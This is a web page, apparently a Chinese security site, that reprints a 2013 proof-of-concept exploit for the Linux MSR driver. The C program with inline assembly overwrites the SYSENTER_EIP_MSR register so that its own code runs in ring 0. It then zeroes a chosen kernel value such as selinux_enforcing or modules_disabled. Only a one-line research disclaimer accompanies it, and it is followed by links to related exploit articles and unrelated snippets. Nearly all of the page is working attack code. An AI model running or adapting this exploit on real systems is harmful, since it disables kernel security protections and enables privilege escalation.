本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  36. u_int64_t msr;
  37. unsignedlong ourstack[65536];
  38. u_int64_t payload_data[16];
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  77. unsignedlong saved_stack;
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }

Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章

  1. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  2. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  3. Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞

    漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...

  4. [转]Mac OS X local privilege escalation (IOBluetoothFamily)

    Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...

  5. Linux Kernel ---- PCI Driver 分析

    自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...

  6. [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)

    #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  9. Linux Kernel - Debug Guide (Linux内核调试指南 )

    http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...

随机推荐

  1. android开发之AlertDialog点击按钮之后不消失 分类: android 学习笔记 2015-07-15 18:07 89人阅读 评论(0) 收藏

    最近有这样一个需求,我需要用户在一个弹出框里输入密码来验证,验证成功当然好说,但是如果验证失败则需要把alertdialog的标题改为"密码错误,请重新输入",并且这个alertd ...

  2. eclipse4.3 kepler中安装maven

    1.软件准备 a:Eclipse 4.3 http://www.eclipse.org/downloads/ b:maven http://maven.apache.org/download.cgi ...

  3. Mac OS命令行运行Sublime Text

    Opening Sublime Text on command line as subl on Mac OS? Mac OS subl http://www.phodal.com/blog/mac-o ...

  4. Image路径问题

    BitmapImage image = new BitmapImage(new Uri("/Pictures/log.png", UriKind.Relative)); evaIm ...

  5. 10.25 noip模拟试题

    今天题目略水2333 依旧不粘题目了23333 T1 /*数学题 给定n个斜率 求有多少个三元组 保证两两斜率不同 ans=C(n,3)-ΣC(len[i],2)*(n-len[i])-ΣC(len[ ...

  6. JS实现一键复制功能

    var copyClick = function (d) { var Url2 = $(d).parent().parent().find("#copy_value"); Url2 ...

  7. Rouh set 入门知识1(基础定义篇)

    粗糙集理论是继概率论.模糊集.证据论后又一处理不完整性和不确定性的数学工具,建立在分类机制的基础上.无需提供问题所处理的数据集合之外的任何先验信息条件.并且能有效分析不精确.不一致.不完整等各种不完备 ...

  8. PHP 的try catch 报错捕获机制

    首先上代码: try { echo 'Never executed'; echo "<br>"; if(1<0){ echo 'end'; }else{ thro ...

  9. C#和asp.net中链接数据库中 参数的几种传递方法

    #region 参数传递方法第一种 //参数设置方法(第一种) //SqlParameter sp = new SqlParameter("@Name", str_Name); / ...

  10. C# Base64编码/解码

    一.编码规则      Base64编码的思想是是采用64个基本的ASCII码字符对数据进行重新编码.它将需要编码的数据拆分成字节数组.以3个字节为一组.按顺序排列24 位数据,再把这24位数据分成4 ...